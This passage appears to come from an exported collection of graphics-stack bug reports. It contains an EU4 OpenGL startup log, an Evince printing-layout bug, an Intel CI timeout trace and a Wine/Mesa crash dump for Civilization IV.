GL_IBM_texture_mirrored_repeat
GL_3DFX_texture_compression_FXT1
GL_ARB_texture_cube_map
GL_ARB_texture_env_add
GL_ARB_transpose_matrix
GL_EXT_blend_func_separate
GL_EXT_fog_coord
GL_EXT_multi_draw_arrays
GL_EXT_secondary_color
GL_EXT_texture_env_add
GL_EXT_texture_filter_anisotropic
GL_EXT_texture_lod_bias
GL_INGR_blend_func_separate
GL_NV_blend_square
GL_NV_light_max_exponent
GL_NV_texgen_reflection
GL_NV_texture_env_combine4
GL_S3_s3tc
GL_SUN_multi_draw_arrays
GL_ARB_texture_border_clamp
GL_ARB_texture_compression
GL_EXT_framebuffer_object
GL_EXT_texture_compression_s3tc
GL_EXT_texture_env_combine
GL_EXT_texture_env_dot3
GL_MESA_window_pos
GL_NV_packed_depth_stencil
GL_NV_texture_rectangle
GL_ARB_depth_texture
GL_ARB_occlusion_query
GL_ARB_shadow
GL_ARB_texture_env_combine
GL_ARB_texture_env_crossbar
GL_ARB_texture_env_dot3
GL_ARB_texture_mirrored_repeat
GL_ARB_window_pos
GL_EXT_stencil_two_side
GL_EXT_texture_cube_map
GL_NV_depth_clamp
GL_APPLE_packed_pixels
GL_APPLE_vertex_array_object
GL_ARB_draw_buffers
GL_ARB_fragment_program
GL_ARB_fragment_shader
GL_ARB_shader_objects
GL_ARB_vertex_program
GL_ARB_vertex_shader
GL_ATI_draw_buffers
GL_ATI_texture_env_combine3
GL_ATI_texture_float
GL_EXT_shadow_funcs
GL_EXT_stencil_wrap
GL_MESA_pack_invert
GL_NV_primitive_restart
GL_ARB_depth_clamp
GL_ARB_fragment_program_shadow
GL_ARB_half_float_pixel
GL_ARB_occlusion_query2
GL_ARB_point_sprite
GL_ARB_shading_language_100
GL_ARB_sync
GL_ARB_texture_non_power_of_two
GL_ARB_vertex_buffer_object
GL_ATI_blend_equation_separate
GL_EXT_blend_equation_separate
GL_OES_read_format
GL_ARB_color_buffer_float
GL_ARB_pixel_buffer_object
GL_ARB_texture_compression_rgtc
GL_ARB_texture_float
GL_ARB_texture_rectangle
GL_EXT_packed_float
GL_EXT_pixel_buffer_object
GL_EXT_texture_compression_dxt1
GL_EXT_texture_compression_rgtc
GL_EXT_texture_rectangle
GL_EXT_texture_sRGB
GL_EXT_texture_shared_exponent
GL_ARB_framebuffer_object
GL_EXT_framebuffer_blit
GL_EXT_framebuffer_multisample
GL_EXT_packed_depth_stencil
GL_APPLE_object_purgeable
GL_ARB_vertex_array_object
GL_ATI_separate_stencil
GL_EXT_draw_buffers2
GL_EXT_draw_instanced
GL_EXT_gpu_program_parameters
GL_EXT_texture_array
GL_EXT_texture_integer
GL_EXT_texture_sRGB_decode
GL_EXT_timer_query
GL_OES_EGL_image
GL_ARB_copy_buffer
GL_ARB_depth_buffer_float
GL_ARB_draw_instanced
GL_ARB_half_float_vertex
GL_ARB_instanced_arrays
GL_ARB_map_buffer_range
GL_ARB_texture_rg
GL_ARB_texture_swizzle
GL_ARB_vertex_array_bgra
GL_EXT_texture_swizzle
GL_EXT_vertex_array_bgra
GL_NV_conditional_render
GL_AMD_conservative_depth
GL_AMD_draw_buffers_blend
GL_AMD_seamless_cubemap_per_texture
GL_AMD_shader_stencil_export
GL_ARB_ES2_compatibility
GL_ARB_blend_func_extended
GL_ARB_debug_output
GL_ARB_draw_buffers_blend
GL_ARB_draw_elements_base_vertex
GL_ARB_explicit_attrib_location
GL_ARB_fragment_coord_conventions
GL_ARB_provoking_vertex
GL_ARB_sample_shading
GL_ARB_sampler_objects
GL_ARB_seamless_cube_map
GL_ARB_shader_stencil_export
GL_ARB_shader_texture_lod
GL_ARB_texture_cube_map_array
GL_ARB_texture_gather
GL_ARB_texture_multisample
GL_ARB_texture_query_lod
GL_ARB_texture_rgb10_a2ui
GL_ARB_uniform_buffer_object
GL_ARB_vertex_type_2_10_10_10_rev
GL_EXT_provoking_vertex
GL_EXT_texture_snorm
GL_MESA_texture_signed_rgba
GL_NV_texture_barrier
GL_ARB_get_program_binary
GL_ARB_robustness
GL_ARB_separate_shader_objects
GL_ARB_shader_bit_encoding
GL_ARB_shader_precision
GL_ARB_texture_compression_bptc
GL_ARB_timer_query
GL_ARB_transform_feedback2
GL_ARB_transform_feedback3
GL_ANGLE_texture_compression_dxt3
GL_ANGLE_texture_compression_dxt5
GL_ARB_compressed_texture_pixel_storage
GL_ARB_conservative_depth
GL_ARB_internalformat_query
GL_ARB_map_buffer_alignment
GL_ARB_shader_atomic_counters
GL_ARB_shader_image_load_store
GL_ARB_shading_language_420pack
GL_ARB_shading_language_packing
GL_ARB_texture_storage
GL_ARB_transform_feedback_instanced
GL_EXT_framebuffer_multisample_blit_scaled
GL_EXT_transform_feedback
GL_AMD_shader_trinary_minmax
GL_ARB_ES3_compatibility
GL_ARB_arrays_of_arrays
GL_ARB_clear_buffer_object
GL_ARB_compute_shader
GL_ARB_copy_image
GL_ARB_explicit_uniform_location
GL_ARB_framebuffer_no_attachments
GL_ARB_invalidate_subdata
GL_ARB_program_interface_query
GL_ARB_robust_buffer_access_behavior
GL_ARB_shader_image_size
GL_ARB_shader_storage_buffer_object
GL_ARB_stencil_texturing
GL_ARB_texture_query_levels
GL_ARB_texture_storage_multisample
GL_ARB_texture_view
GL_ARB_vertex_attrib_binding
GL_KHR_debug
GL_KHR_robustness
GL_KHR_texture_compression_astc_ldr
GL_ARB_buffer_storage
GL_ARB_clear_texture
GL_ARB_internalformat_query2
GL_ARB_multi_bind
GL_ARB_query_buffer_object
GL_ARB_seamless_cubemap_per_texture
GL_ARB_shader_draw_parameters
GL_ARB_texture_mirror_clamp_to_edge
GL_ARB_texture_stencil8
GL_ARB_vertex_type_10f_11f_11f_rev
GL_EXT_shader_integer_mix
GL_ARB_clip_control
GL_ARB_conditional_render_inverted
GL_ARB_cull_distance
GL_ARB_derivative_control
GL_ARB_get_texture_sub_image
GL_ARB_pipeline_statistics_query
GL_ARB_shader_texture_image_samples
GL_ARB_texture_barrier
GL_EXT_polygon_offset_clamp
GL_KHR_context_flush_control
GL_KHR_robust_buffer_access_behavior
GL_ARB_shader_clock
GL_EXT_shader_samples_identical
[graphicssettings.cpp:695]: Usable res: 2560 1440 59
[graphicssettings.cpp:695]: Usable res: 2048 1152 60
[graphicssettings.cpp:695]: Usable res: 1920 1200 59
[graphicssettings.cpp:695]: Usable res: 1920 1080 60
[graphicssettings.cpp:695]: Usable res: 1920 1080 59
[graphicssettings.cpp:695]: Usable res: 1920 1080 50
[graphicssettings.cpp:695]: Usable res: 1920 1080 30
[graphicssettings.cpp:695]: Usable res: 1920 1080 29
[graphicssettings.cpp:695]: Usable res: 1920 1080 25
[graphicssettings.cpp:695]: Usable res: 1920 1080 24
[graphicssettings.cpp:695]: Usable res: 1920 1080 23
[graphicssettings.cpp:695]: Usable res: 1680 1050 59
[graphicssettings.cpp:695]: Usable res: 1600 1200 60
[graphicssettings.cpp:695]: Usable res: 1280 1024 75
[graphicssettings.cpp:695]: Usable res: 1280 1024 60
[graphicssettings.cpp:695]: Usable res: 1280 720 60
[graphicssettings.cpp:695]: Usable res: 1280 720 59
[graphicssettings.cpp:695]: Usable res: 1280 720 50
[graphicssettings.cpp:695]: Usable res: 1200 960 59
[graphicssettings.cpp:695]: Usable res: 1152 864 75
[graphicssettings.cpp:695]: Usable res: 1024 768 75
[graphicssettings.cpp:695]: Usable res: 1024 768 60
[graphicssettings.cpp:695]: Usable res: 800 600 75
[graphicssettings.cpp:695]: Usable res: 800 600 60
[graphicssettings.cpp:695]: Usable res: 720 576 50
[graphicssettings.cpp:695]: Usable res: 720 480 60
[graphicssettings.cpp:695]: Usable res: 720 480 59
[graphicssettings.cpp:695]: Usable res: 720 400 70
[graphicssettings.cpp:695]: Usable res: 640 480 75
[graphicssettings.cpp:695]: Usable res: 640 480 60
[graphicssettings.cpp:695]: Usable res: 640 480 59
[graphics.cpp:844]: Done creating device.
[graphicssettings.cpp:695]: Usable res: 2560 1440 59
[graphicssettings.cpp:695]: Usable res: 2048 1152 60
[graphicssettings.cpp:695]: Usable res: 1920 1200 59
[graphicssettings.cpp:695]: Usable res: 1920 1080 60
[graphicssettings.cpp:695]: Usable res: 1920 1080 59
[graphicssettings.cpp:695]: Usable res: 1920 1080 50
[graphicssettings.cpp:695]: Usable res: 1920 1080 30
[graphicssettings.cpp:695]: Usable res: 1920 1080 29
[graphicssettings.cpp:695]: Usable res: 1920 1080 25
[graphicssettings.cpp:695]: Usable res: 1920 1080 24
[graphicssettings.cpp:695]: Usable res: 1920 1080 23
[graphicssettings.cpp:695]: Usable res: 1680 1050 59
[graphicssettings.cpp:695]: Usable res: 1600 1200 60
[graphicssettings.cpp:695]: Usable res: 1280 1024 75
[graphicssettings.cpp:695]: Usable res: 1280 1024 60
[graphicssettings.cpp:695]: Usable res: 1280 720 60
[graphicssettings.cpp:695]: Usable res: 1280 720 59
[graphicssettings.cpp:695]: Usable res: 1280 720 50
[graphicssettings.cpp:695]: Usable res: 1200 960 59
[graphicssettings.cpp:695]: Usable res: 1152 864 75
[graphicssettings.cpp:695]: Usable res: 1024 768 75
[graphicssettings.cpp:695]: Usable res: 1024 768 60
[graphicssettings.cpp:695]: Usable res: 800 600 75
[graphicssettings.cpp:695]: Usable res: 800 600 60
[graphicssettings.cpp:695]: Usable res: 720 576 50
[graphicssettings.cpp:695]: Usable res: 720 480 60
[graphicssettings.cpp:695]: Usable res: 720 480 59
[graphicssettings.cpp:695]: Usable res: 720 400 70
[graphicssettings.cpp:695]: Usable res: 640 480 75
[graphicssettings.cpp:695]: Usable res: 640 480 60
[graphicssettings.cpp:695]: Usable res: 640 480 59
[main.cpp:1322]: EU4 Version Jun  3 2016 : 15:25:35
[main.cpp:1331]: Creating application...
[graphicssettings.cpp:736]: Not using multisampling.
[main.cpp:1385]: Initializing application...
[eu4application.cpp:410]: Initializing application...
[eu4application.cpp:412]: Done initializing application
[eu4application.cpp:417]: Loading cursor...
[eu4application.cpp:488]: Done loading cursor
[eu4application.cpp:490]: Initializing sound...
[eu4application.cpp:506]: Done initializing sound
[eu4application.cpp:508]: Initializing graphics...
[graphicssettings.cpp:736]: Not using multisampling.
[graphics.cpp:811]: Creating device with: HARDWARE_VERTEXPROCESSING
	Fullscreen=yes
	RefreshRate=59
	Resolution=2560x1440
[gfx_opengl.cpp:1033]: 
OpenGL Version: 3.0 Mesa 12.0.1
Supported Extensions:
GL_ARB_multisample
GL_EXT_abgr
GL_EXT_bgra
GL_EXT_blend_color
GL_EXT_blend_minmax
GL_EXT_blend_subtract
GL_EXT_copy_texture
GL_EXT_polygon_offset
GL_EXT_subtexture
GL_EXT_texture_object
GL_EXT_vertex_array
GL_EXT_compiled_vertex_array
GL_EXT_texture
GL_EXT_texture3D
GL_IBM_rasterpos_clip
GL_ARB_point_parameters
GL_EXT_draw_range_elements
GL_EXT_packed_pixels
GL_EXT_point_parameters
GL_EXT_rescale_normal
GL_EXT_separate_specular_color
GL_EXT_texture_edge_clamp
GL_SGIS_generate_mipmap
GL_SGIS_texture_border_clamp
GL_SGIS_texture_edge_clamp
GL_SGIS_texture_lod
GL_ARB_framebuffer_sRGB
GL_ARB_multitexture
GL_EXT_framebuffer_sRGB
GL_IBM_multimode_draw_arrays
GL_IBM_texture_mirrored_repeat
GL_3DFX_texture_compression_FXT1
GL_ARB_texture_cube_map
GL_ARB_texture_env_add
GL_ARB_transpose_matrix
GL_EXT_blend_func_separate
GL_EXT_fog_coord
GL_EXT_multi_draw_arrays
GL_EXT_secondary_color
GL_EXT_texture_env_add
GL_EXT_texture_filter_anisotropic
GL_EXT_texture_lod_bias
GL_INGR_blend_func_separate
GL_NV_blend_square
GL_NV_light_max_exponent
GL_NV_texgen_reflection
GL_NV_texture_env_combine4
GL_S3_s3tc
GL_SUN_multi_draw_arrays
GL_ARB_texture_border_clamp
GL_ARB_texture_compression
GL_EXT_framebuffer_object
GL_EXT_texture_compression_s3tc
GL_EXT_texture_env_combine
GL_EXT_texture_env_dot3
GL_MESA_window_pos
GL_NV_packed_depth_stencil
GL_NV_texture_rectangle
GL_ARB_depth_texture
GL_ARB_occlusion_query
GL_ARB_shadow
GL_ARB_texture_env_combine
GL_ARB_texture_env_crossbar
GL_ARB_texture_env_dot3
GL_ARB_texture_mirrored_repeat
GL_ARB_window_pos
GL_EXT_stencil_two_side
GL_EXT_texture_cube_map
GL_NV_depth_clamp
GL_APPLE_packed_pixels
GL_APPLE_vertex_array_object
GL_ARB_draw_buffers
GL_ARB_fragment_program
GL_ARB_fragment_shader
GL_ARB_shader_objects
GL_ARB_vertex_program
GL_ARB_vertex_shader
GL_ATI_draw_buffers
GL_ATI_texture_env_combine3
GL_ATI_texture_float
GL_EXT_shadow_funcs
GL_EXT_stencil_wrap
GL_MESA_pack_invert
GL_NV_primitive_restart
GL_ARB_depth_clamp
GL_ARB_fragment_program_shadow
GL_ARB_half_float_pixel
GL_ARB_occlusion_query2
GL_ARB_point_sprite
GL_ARB_shading_language_100
GL_ARB_sync
GL_ARB_texture_non_power_of_two
GL_ARB_vertex_buffer_object
GL_ATI_blend_equation_separate
GL_EXT_blend_equation_separate
GL_OES_read_format
GL_ARB_color_buffer_float
GL_ARB_pixel_buffer_object
GL_ARB_texture_compression_rgtc
GL_ARB_texture_float
GL_ARB_texture_rectangle
GL_EXT_packed_float
GL_EXT_pixel_buffer_object
GL_EXT_texture_compression_dxt1
GL_EXT_texture_compression_rgtc
GL_EXT_texture_rectangle
GL_EXT_texture_sRGB
GL_EXT_texture_shared_exponent
GL_ARB_framebuffer_object
GL_EXT_framebuffer_blit
GL_EXT_framebuffer_multisample
GL_EXT_packed_depth_stencil
GL_APPLE_object_purgeable
GL_ARB_vertex_array_object
GL_ATI_separate_stencil
GL_EXT_draw_buffers2
GL_EXT_draw_instanced
GL_EXT_gpu_program_parameters
GL_EXT_texture_array
GL_EXT_texture_integer
GL_EXT_texture_sRGB_decode
GL_EXT_timer_query
GL_OES_EGL_image
GL_ARB_copy_buffer
GL_ARB_depth_buffer_float
GL_ARB_draw_instanced
GL_ARB_half_float_vertex
GL_ARB_instanced_arrays
GL_ARB_map_buffer_range
GL_ARB_texture_rg
GL_ARB_texture_swizzle
GL_ARB_vertex_array_bgra
GL_EXT_texture_swizzle
GL_EXT_vertex_array_bgra
GL_NV_conditional_render
GL_AMD_conservative_depth
GL_AMD_draw_buffers_blend
GL_AMD_seamless_cubemap_per_texture
GL_AMD_shader_stencil_export
GL_ARB_ES2_compatibility
GL_ARB_blend_func_extended
GL_ARB_debug_output
GL_ARB_draw_buffers_blend
GL_ARB_draw_elements_base_vertex
GL_ARB_explicit_attrib_location
GL_ARB_fragment_coord_conventions
GL_ARB_provoking_vertex
GL_ARB_sample_shading
GL_ARB_sampler_objects
GL_ARB_seamless_cube_map
GL_ARB_shader_stencil_export
GL_ARB_shader_texture_lod
GL_ARB_texture_cube_map_array
GL_ARB_texture_gather
GL_ARB_texture_multisample
GL_ARB_texture_query_lod
GL_ARB_texture_rgb10_a2ui
GL_ARB_uniform_buffer_object
GL_ARB_vertex_type_2_10_10_10_rev
GL_EXT_provoking_vertex
GL_EXT_texture_snorm
GL_MESA_texture_signed_rgba
GL_NV_texture_barrier
GL_ARB_get_program_binary
GL_ARB_robustness
GL_ARB_separate_shader_objects
GL_ARB_shader_bit_encoding
GL_ARB_shader_precision
GL_ARB_texture_compression_bptc
GL_ARB_timer_query
GL_ARB_transform_feedback2
GL_ARB_transform_feedback3
GL_ANGLE_texture_compression_dxt3
GL_ANGLE_texture_compression_dxt5
GL_ARB_compressed_texture_pixel_storage
GL_ARB_conservative_depth
GL_ARB_internalformat_query
GL_ARB_map_buffer_alignment
GL_ARB_shader_atomic_counters
GL_ARB_shader_image_load_store
GL_ARB_shading_language_420pack
GL_ARB_shading_language_packing
GL_ARB_texture_storage
GL_ARB_transform_feedback_instanced
GL_EXT_framebuffer_multisample_blit_scaled
GL_EXT_transform_feedback
GL_AMD_shader_trinary_minmax
GL_ARB_ES3_compatibility
GL_ARB_arrays_of_arrays
GL_ARB_clear_buffer_object
GL_ARB_compute_shader
GL_ARB_copy_image
GL_ARB_explicit_uniform_location
GL_ARB_framebuffer_no_attachments
GL_ARB_invalidate_subdata
GL_ARB_program_interface_query
GL_ARB_robust_buffer_access_behavior
GL_ARB_shader_image_size
GL_ARB_shader_storage_buffer_object
GL_ARB_stencil_texturing
GL_ARB_texture_query_levels
GL_ARB_texture_storage_multisample
GL_ARB_texture_view
GL_ARB_vertex_attrib_binding
GL_KHR_debug
GL_KHR_robustness
GL_KHR_texture_compression_astc_ldr
GL_ARB_buffer_storage
GL_ARB_clear_texture
GL_ARB_internalformat_query2
GL_ARB_multi_bind
GL_ARB_query_buffer_object
GL_ARB_seamless_cubemap_per_texture
GL_ARB_shader_draw_parameters
GL_ARB_texture_mirror_clamp_to_edge
GL_ARB_texture_stencil8
GL_ARB_vertex_type_10f_11f_11f_rev
GL_EXT_shader_integer_mix
GL_ARB_clip_control
GL_ARB_conditional_render_inverted
GL_ARB_cull_distance
GL_ARB_derivative_control
GL_ARB_get_texture_sub_image
GL_ARB_pipeline_statistics_query
GL_ARB_shader_texture_image_samples
GL_ARB_texture_barrier
GL_EXT_polygon_offset_clamp
GL_KHR_context_flush_control
GL_KHR_robust_buffer_access_behavior
GL_ARB_shader_clock
GL_EXT_shader_samples_identical
[graphicssettings.cpp:695]: Usable res: 2560 1440 59
[graphicssettings.cpp:695]: Usable res: 2048 1152 60
[graphicssettings.cpp:695]: Usable res: 1920 1200 59
[graphicssettings.cpp:695]: Usable res: 1920 1080 60
[graphicssettings.cpp:695]: Usable res: 1920 1080 59
[graphicssettings.cpp:695]: Usable res: 1920 1080 50
[graphicssettings.cpp:695]: Usable res: 1920 1080 30
[graphicssettings.cpp:695]: Usable res: 1920 1080 29
[graphicssettings.cpp:695]: Usable res: 1920 1080 25
[graphicssettings.cpp:695]: Usable res: 1920 1080 24
[graphicssettings.cpp:695]: Usable res: 1920 1080 23
[graphicssettings.cpp:695]: Usable res: 1680 1050 59
[graphicssettings.cpp:695]: Usable res: 1600 1200 60
[graphicssettings.cpp:695]: Usable res: 1280 1024 75
[graphicssettings.cpp:695]: Usable res: 1280 1024 60
[graphicssettings.cpp:695]: Usable res: 1280 720 60
[graphicssettings.cpp:695]: Usable res: 1280 720 59
[graphicssettings.cpp:695]: Usable res: 1280 720 50
[graphicssettings.cpp:695]: Usable res: 1200 960 59
[graphicssettings.cpp:695]: Usable res: 1152 864 75
[graphicssettings.cpp:695]: Usable res: 1024 768 75
[graphicssettings.cpp:695]: Usable res: 1024 768 60
[graphicssettings.cpp:695]: Usable res: 800 600 75
[graphicssettings.cpp:695]: Usable res: 800 600 60
[graphicssettings.cpp:695]: Usable res: 720 576 50
[graphicssettings.cpp:695]: Usable res: 720 480 60
[graphicssettings.cpp:695]: Usable res: 720 480 59
[graphicssettings.cpp:695]: Usable res: 720 400 70
[graphicssettings.cpp:695]: Usable res: 640 480 75
[graphicssettings.cpp:695]: Usable res: 640 480 60
[graphicssettings.cpp:695]: Usable res: 640 480 59
[graphics.cpp:844]: Done creating device.
[eu4application.cpp:584]: Done initializing graphics
[main.cpp:1425]: Running application...
Let me know what more I can provide.</t>
  </si>
  <si>
    <t>POPPLER-6590</t>
  </si>
  <si>
    <t>Evince 2 pages to 1 layout setting has no effect</t>
  </si>
  <si>
    <t>Printing 2 pages to 1 sheet does not work prints 1 page to 1 sheet regardless 
of setting 2 pages to 1 under paper tab in print menu.
On Ubuntu Breezy 5.10
Using evince 0.4.0-0ubuntu4.1
Using non-free turboprint printer driver 1.94 on Canon PIXMA IP5200 printer.
No such problem with 2 to 1 layout when using xpdf 3.01-1ubuntu1 instead of 
evince.</t>
  </si>
  <si>
    <t>pkoufalas</t>
  </si>
  <si>
    <t>DRI-109673</t>
  </si>
  <si>
    <t>[CI][DRMTIP] Random tests - timeout - Received signal SIGQUIT</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_221/fi-icl-u2/igt@gem_tiled_pread_pwrite.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_221/fi-icl-u2/igt@gem_pwrite_pread@uncached-pwrite-blt-gtt_mmap-performance.html
Received signal SIGQUIT.
Stack trace: 
 #0 [fatal_sig_handler+0xd5]
 #1 [killpg+0x40]
 #2 [memcpy_from_wc_sse41+0x184]
 #3 [copy_wc_page+0x28]
 #4 [__real_main108+0x1c8]
 #5 [main+0x44]
 #6 [__libc_start_main+0xe7]
 #7 [_start+0x2a]</t>
  </si>
  <si>
    <t>MESA-23760</t>
  </si>
  <si>
    <t>Wine crashes on libdrm_intel.so/i915_dri.so with Mesa-7.5 and 7.5.1</t>
  </si>
  <si>
    <t>The error occurs under Wine while trying to launch Civilization IV (both basic
and BtS) under Wine. I followed the instructions from the thread below:
http://osdir.com/ml/wine-users/2009-08/msg00427.html
...and changed OffscreenRenderingMode to backbuffer. This solves the
problem described there but runs into another. Setting it to pbuffer
gives the same result:
-------8&lt;--------
Unhandled exception: page fault on read access to 0x00000010 in 32-bit
code (0xb774b594).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:b774b594 ESP:0033f018 EBP:0033f050 EFLAGS:00010292(  R- --  I S -A- - )
 EAX:00000000 EBX:b7752ff4 ECX:00000060 EDX:001e08c0
 ESI:00000000 EDI:00000060
Stack dump:
0x0033f018:  00110000 00000008 000e0000 7ef891c1
0x0033f028:  00000009 b7ea4ff4 b7ea6380 7efe3ff4
0x0033f038:  001e08a0 7efe3ff4 0033f0b0 b79d5ff4
0x0033f048:  b7449008 00000060 0033f070 b779bc5b
0x0033f058:  00000000 00000000 00000060 001e08c0
0x0033f068:  b7449008 b79d5ff4 0033f0b0 b77f0a30
Backtrace:
=&gt;0 0xb774b594 drm_intel_bo_get_subdata+0x1d() in libdrm_intel.so.1 (0x0033f050)
 1 0xb779bc5b in i915_dri.so (+0x2bc5b) (0x0033f070)
 2 0xb77f0a30 _mesa_GetBufferSubDataARB+0x93() in i915_dri.so (0x0033f0b0)
 3 0xb7ab7d2b buffer_get_sysmem+0x9f() in wined3d (0x0033f0d0)
 4 0xb7ab9571 in wined3d (+0x29571) (0x0033f170)
 5 0xb7ad9607 device_stream_info_from_declaration+0x68f() in wined3d
(0x0033f230)
 6 0xb7b4169e in wined3d (+0xb169e) (0x0033f2c0)
 7 0xb7b0f73a in wined3d (+0x7f73a) (0x0033f2f0)
 8 0xb7ac1f39 ActivateContext+0x2a3() in wined3d (0x0033f3a0)
 9 0xb7af7167 drawPrimitive+0xe5() in wined3d (0x0033f750)
 10 0xb7acfa21 in wined3d (+0x3fa21) (0x0033f7b0)
 11 0xb7cc3af7 in d3d9 (+0x13af7) (0x0033f800)
 12 0x009a33fd in civ4beyondsword (+0x5a33fd) (0x1a1ffa50)
 13 0x00000000 (0x00ad63a8)
 14 0x009a4620 in civ4beyondsword (+0x5a4620) (0x009a68a0)
0xb774b594 drm_intel_bo_get_subdata+0x1d in libdrm_intel.so.1:
movl    0x10(%esi)%eax
Modules:
Module  Address                 Debug info      Name (123 modules)
PE        340000-  353000       Deferred        zlib1
PE        360000-  36e000       Deferred        hapdbg
PE        400000- 100a000       Export          civ4beyondsword
PE       1010000- 137f000       Deferred        d3dx9_33
PE       1c70000- 2131000       Deferred        cvgamecoredll
PE       fe90000- feb0000       Deferred        msseax.flt
PE       ffc0000- ffcd000       Deferred        msssrs.flt
PE      10000000-1002b000       Deferred        boost_python-vc71-mt-1_32
PE      18000000-18038000       Deferred        binkw32
PE      1b690000-1b8f7000       Deferred        d3dx9_31
PE      1e000000-1e1ca000       Deferred        python24
PE      21100000-2118c000       Deferred        mss32
PE      22300000-2230c000       Deferred        mssds3d.flt
PE      23000000-2300a000       Deferred        mssdolby.flt
PE      24100000-2411e000       Deferred        mssdsp.flt
PE      26400000-2643a000       Deferred        mssvoice.asi
PE      26f00000-26f2e000       Deferred        mssmp3.asi
PE      69b10000-69c14000       Deferred        msxml3
ELF     7bf00000-7bf04000       Deferred        
PE      7c340000-7c396000       Deferred        msvcr71
PE      7c3a0000-7c41b000       Deferred        msvcp71
ELF     7d4c0000-7d4e5000       Deferred        msacm32
 \-PE  7d4d0000-7d4e5000       \               msacm32
ELF     7d4e5000-7d4fd000       Deferred        msacm32
 \-PE  7d4f0000-7d4fd000       \               msacm32
ELF     7dcfe000-7dd03000       Deferred        libgdbm.so.3
ELF     7dd03000-7dd09000       Deferred        libcap.so.2
ELF     7dd09000-7dd48000       Deferred        libdbus-1.so.3
ELF     7dd48000-7dd5d000       Deferred        libresolv.so.2
ELF     7dd5d000-7dd63000       Deferred        libasyncns.so.0
ELF     7dd63000-7ddaa000       Deferred        libpulsecommon-0.9.15.so
ELF     7ddaa000-7dde7000       Deferred        libpulse.so.0
ELF     7dde9000-7ddfe000       Deferred        midimap
 \-PE  7ddf0000-7ddfe000       \               midimap
ELF     7ddfe000-7de07000       Deferred        librt.so.1
ELF     7de07000-7dedd000       Deferred        libasound.so.2
ELF     7dede000-7dee7000       Deferred        libwrap.so.0
ELF     7dee7000-7deed000       Deferred        libxtst.so.6
ELF     7deed000-7def4000       Deferred        libasound_module_pcm_pulse.so
ELF     7def4000-7df2a000       Deferred        winealsa
 \-PE  7df00000-7df2a000       \               winealsa
ELF     7df6f000-7dfa1000       Deferred        uxtheme
 \-PE  7df80000-7dfa1000       \               uxtheme
ELF     7dfa1000-7dfa7000       Deferred        libxfixes.so.3
ELF     7dfa7000-7dfb1000       Deferred        libxcursor.so.1
ELF     7dfb1000-7dfb5000       Deferred        libxcomposite.so.1
ELF     7dfb5000-7dfbd000       Deferred        libxrandr.so.2
ELF     7dfbd000-7dfc6000       Deferred        libxrender.so.1
ELF     7dfc6000-7dfcc000       Deferred        libxxf86vm.so.1
ELF     7dfcc000-7dfd0000       Deferred        libxinerama.so.1
ELF     7dfd0000-7dff0000       Deferred        imm32
 \-PE  7dfe0000-7dff0000       \               imm32
ELF     7dff0000-7dff5000       Deferred        libxdmcp.so.6
ELF     7dff5000-7dff9000       Deferred        libxau.so.6
ELF     7dff9000-7e015000       Deferred        libxcb.so.1
ELF     7e015000-7e01a000       Deferred        libuuid.so.1
ELF     7e01a000-7e032000       Deferred        libice.so.6
ELF     7e032000-7e157000       Deferred        libx11.so.6
ELF     7e157000-7e167000       Deferred        libxext.so.6
ELF     7e167000-7e170000       Deferred        libsm.so.6
ELF     7e170000-7e209000       Deferred        winex11
 \-PE  7e180000-7e209000       \               winex11
ELF     7e231000-7e257000       Deferred        libexpat.so.0
ELF     7e257000-7e289000       Deferred        libfontconfig.so.1
ELF     7e289000-7e29b000       Deferred        libz.so.1
ELF     7e29b000-7e317000       Deferred        libfreetype.so.6
ELF     7e32e000-7e377000       Deferred        dsound
 \-PE  7e340000-7e377000       \               dsound
ELF     7e377000-7e452000       Deferred        oleaut32
 \-PE  7e390000-7e452000       \               oleaut32
ELF     7e452000-7e4bb000       Deferred        rpcrt4
 \-PE  7e460000-7e4bb000       \               rpcrt4
ELF     7e4bb000-7e5aa000       Deferred        ole32
 \-PE  7e4d0000-7e5aa000       \               ole32
ELF     7e5aa000-7e5be000       Deferred        lz32
 \-PE  7e5b0000-7e5be000       \               lz32
ELF     7e5be000-7e5d8000       Deferred        version
 \-PE  7e5c0000-7e5d8000       \               version
ELF     7e5d8000-7e605000       Deferred        ws2_32
 \-PE  7e5e0000-7e605000       \               ws2_32
ELF     7e605000-7e69e000       Deferred        winmm
 \-PE  7e610000-7e69e000       \               winmm
ELF     7e69e000-7e708000       Deferred        msvcrt
 \-PE  7e6b0000-7e708000       \               msvcrt
ELF     7e708000-7e7c8000       Deferred        comctl32
 \-PE  7e710000-7e7c8000       \               comctl32
ELF     7e7c8000-7e820000       Deferred        shlwapi
 \-PE  7e7d0000-7e820000       \               shlwapi
ELF     7e820000-7e9a8000       Deferred        shell32
 \-PE  7e830000-7e9a8000       \               shell32
ELF     7e9a8000-7e9fb000       Deferred        advapi32
 \-PE  7e9b0000-7e9fb000       \               advapi32
ELF     7e9fb000-7ea96000       Deferred        gdi32
 \-PE  7ea10000-7ea96000       \               gdi32
ELF     7ea96000-7ebd5000       Deferred        user32
 \-PE  7eab0000-7ebd5000       \               user32
ELF     7edc1000-7ef23000       Deferred        kernel32
 \-PE  7ede0000-7ef23000       \               kernel32
ELF     7ef23000-7ef2f000       Deferred        libnss_files.so.2
ELF     7ef2f000-7ef57000       Deferred        libm.so.6
ELF     7ef57000-7f000000       Deferred        ntdll
 \-PE  7ef70000-7f000000       \               ntdll
ELF     b774a000-b7754000       Export          libdrm_intel.so.1
ELF     b7754000-b7770000       Deferred        libselinux.so.1
ELF     b7770000-b79f1000       Export          i915_dri.so
ELF     b79f1000-b79fc000       Deferred        libdrm.so.2
ELF     b79fc000-b7a67000       Deferred        libgl.so.1
ELF     b7a7e000-b7baa000       Export          wined3d
 \-PE  b7a90000-b7baa000       \               wined3d
ELF     b7baa000-b7c2f000       Deferred        crypt32
 \-PE  b7bb0000-b7c2f000       \               crypt32
ELF     b7c2f000-b7c68000       Deferred        rsaenh
 \-PE  b7c40000-b7c68000       \               rsaenh
ELF     b7caa000-b7cae000       Deferred        libxdamage.so.1
ELF     b7cae000-b7cdc000       Export          d3d9
 \-PE  b7cb0000-b7cdc000       \               d3d9
ELF     b7d2e000-b7d43000       Deferred        wtsapi32
 \-PE  b7d30000-b7d43000       \               wtsapi32
ELF     b7d4d000-b7d51000       Deferred        libdl.so.2
ELF     b7d51000-b7ea9000       Deferred        libc.so.6
ELF     b7ea9000-b7ec2000       Deferred        libpthread.so.0
